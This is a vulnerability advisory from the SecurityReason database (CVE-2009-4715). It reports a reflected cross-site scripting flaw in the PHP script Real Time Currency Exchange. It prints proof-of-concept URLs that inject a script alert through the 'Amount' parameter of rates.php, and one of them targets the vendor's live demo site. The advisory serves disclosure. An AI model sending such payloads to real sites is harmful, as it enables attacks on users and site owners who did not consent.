|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Real Time Currency Exchange Remote Xss
|
SecurityAlert : 7125
CVE : CVE-2009-4715
CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : No
Credit : 599eme Man
Published : 17.03.2010
Affected Software : | phpscriptsnow:real_time_currency_exchange |
 Advisory Content :
# [+] Real Time Currency Exchange Remote Xss
# [+] Software : Real Time Currency Exchange
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen,
Pr0H4ck3rz, Staker...
# [+] Special Thanks : Moudi Aka SixSo brozazaaaaaaaaa
# [+] Dowload :
http://www.phpscriptsnow.com/product_info.php?cPath=21&products_id=64
#
#[-------------------------------------------------------------------------
-----------]
#
# [+] Vulnerabilities
#
# [+] XSS
#
# -
http://www.site.com/path/rates.php?Amount=%27%22%3E%3Cscript%3Ealert(String
.fromCharCode(88,83,83))%3C/script%3E&From=ADF&To=ADF&Service=xe&submit=Exc
hange
#
# [+] Demo :
#
# -
http://www.phpscriptsnow.com/demo/finance-tools-3/rates.php?Amount=%27%22%3
E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&From=ADF&To=
ADF&Service=xe&submit=Exchange
#
#[-------------------------------------------------------------------------
-----------]
#
###########################################################################
##############################
References :
http://xforce.iss.net/xforce/xfdb/51853
http://www.osvdb.org/56081
http://secunia.com/advisories/35936
http://packetstormsecurity.org/0907-exploits/rtce-xss.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|